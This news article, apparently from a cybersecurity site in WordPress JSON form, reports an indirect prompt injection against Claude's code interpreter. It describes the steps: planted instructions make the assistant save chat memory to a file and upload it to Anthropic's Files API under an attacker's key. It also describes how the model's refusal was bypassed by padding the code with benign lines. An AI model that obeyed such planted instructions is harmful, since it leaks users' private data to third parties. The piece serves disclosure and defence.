{"id":5620,"date":"2025-10-31T12:27:43","date_gmt":"2025-10-31T12:27:43","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=5620"},"modified":"2025-10-31T12:27:43","modified_gmt":"2025-10-31T12:27:43","slug":"claude-ai-vulnerability-exposes-enterprise-data-through-code-interpreter-exploit","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=5620","title":{"rendered":"Claude AI vulnerability exposes enterprise data through code interpreter exploit"},"content":{"rendered":"<div>\n<div class=\"grid grid--cols-10@md grid--cols-8@lg article-column\">\n<div class=\"col-12 col-10@md col-6@lg col-start-3@lg\">\n<div class=\"article-column__content\">\n<div class=\"container\"><\/div>\n<p>A newly disclosed vulnerability in Anthropic\u2019s Claude AI assistant has revealed how attackers can weaponize the platform\u2019s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks.<\/p>\n<p>Security researcher Johann Rehberger demonstrated that Claude\u2019s code interpreter can be manipulated through indirect prompt injection to steal sensitive information, including chat histories, uploaded documents, and data accessed through integrated services. The attack leveraged Claude\u2019s own API infrastructure to send stolen data directly to attacker-controlled accounts.<\/p>\n<p>The exploit took advantage of a critical oversight in Claude\u2019s network access controls. While the platform\u2019s default \u201cPackage managers only\u201d setting restricted outbound connections to approved domains like npm and PyPI, it also allowed access to api.anthropic.com, the very endpoint attackers can abuse for data theft.<\/p>\n<h2 class=\"wp-block-heading\">How the attack works<\/h2>\n<p>The attack chain orchestrated by the researcher relied on indirect prompt injection, where malicious instructions are hidden within documents, websites, or other content that users ask Claude to analyze. Once triggered, the exploit executes a multi-stage process:<\/p>\n<p>First, Claude retrieves sensitive data \u2014 such as recent conversation history using the platform\u2019s newly introduced memory feature \u2014 and writes it to a file in the code interpreter sandbox. The malicious payload then instructs Claude to execute Python code that uploads the file to Anthropic\u2019s Files API, but with a crucial twist: the upload uses the attacker\u2019s API key rather than the victim\u2019s.<\/p>\n<p>\u201cThis code issues a request to upload the file from the sandbox. However, this is done with a twist,\u201d <a href=\"https:\/\/embracethered.com\/blog\/posts\/2025\/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration\/\" target=\"_blank\" rel=\"noopener\">Rehberger wrote in his blog post<\/a>. \u201cThe upload will not happen to the user\u2019s Anthropic account, but to the attackers, because it\u2019s using the attacker\u2019s ANTHROPIC_API_KEY.\u201d<\/p>\n<p>The technique allows exfiltration of up to 30MB per file, according to <a href=\"https:\/\/support.claude.com\/en\/articles\/12111783-create-and-edit-files-with-claude#h_27fc9da35e\" target=\"_blank\" rel=\"noopener\">Anthropic\u2019s API documentation<\/a>, with no limit on the number of files that can be uploaded.<\/p>\n<h2 class=\"wp-block-heading\">Bypassing AI safety controls<\/h2>\n<p>Rehberger\u2019s report stated that developing a reliable exploit proved challenging due to Claude\u2019s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions \u2014 such as simple print statements \u2014 was sufficient to bypass these safeguards.<\/p>\n<p>\u201cI tried tricks like XOR and base64 encoding. None worked reliably,\u201d Rehberger explained. \u201cHowever, I found a way around it\u2026 I just mixed in a lot of benign code, like print (\u2018Hello, world\u2019), and that convinced Claude that not too many malicious things are happening.\u201d<\/p>\n<p>Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.<\/p>\n<p>Rehberger disputed this categorization. \u201cI do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,\u201d he wrote. \u201cSafety protects you from accidents. Security protects you from adversaries.\u201d<\/p>\n<p>Anthropic did not immediately respond to a request for comment.<\/p>\n<h2 class=\"wp-block-heading\">Attack vectors and real-world risk<\/h2>\n<p>The vulnerability can be exploited through multiple entry points, the blog post added. \u201cMalicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,\u201d the blog added.<\/p>\n<p>Organizations using Claude for sensitive tasks \u2014 such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases \u2014 face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations.<\/p>\n<p>For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude\u2019s functionality. Anthropic recommends monitoring Claude\u2019s actions and manually stopping execution if suspicious behavior is detected \u2014 an approach Rehberger characterizes as \u201cliving dangerously.\u201d<\/p>\n<p>The company\u2019s <a href=\"https:\/\/support.claude.com\/en\/articles\/12111783-create-and-edit-files-with-claude#h_27fc9da35e\" target=\"_blank\" rel=\"noopener\">security documentation<\/a> also acknowledges the risk: \u201cThis means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties,\u201d Rehberger noted.<\/p>\n<p>However, enterprises may incorrectly assume the default \u201cPackage managers only\u201d configuration provides adequate protection. Rehberger\u2019s research demonstrated that the assumption is false. Rehberger has not published the complete exploit code to protect users while the vulnerability remains unpatched. He noted that other domains on Anthropic\u2019s approved list may present similar exploitation opportunities.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>A newly disclosed vulnerability in Anthropic\u2019s Claude AI assistant has revealed how attackers can weaponize the platform\u2019s code interpreter feature to silently exfiltrate enterprise data, bypassing even the default security settings designed to prevent such attacks. Security researcher Johann Rehberger demonstrated that Claude\u2019s code interpreter can be manipulated through indirect prompt injection to steal sensitive [&hellip;]<\/p>\n","protected":false},"author":0,"featured_media":5621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-5620","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5620"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5620"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/5620\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/5621"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5620"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5620"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5620"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}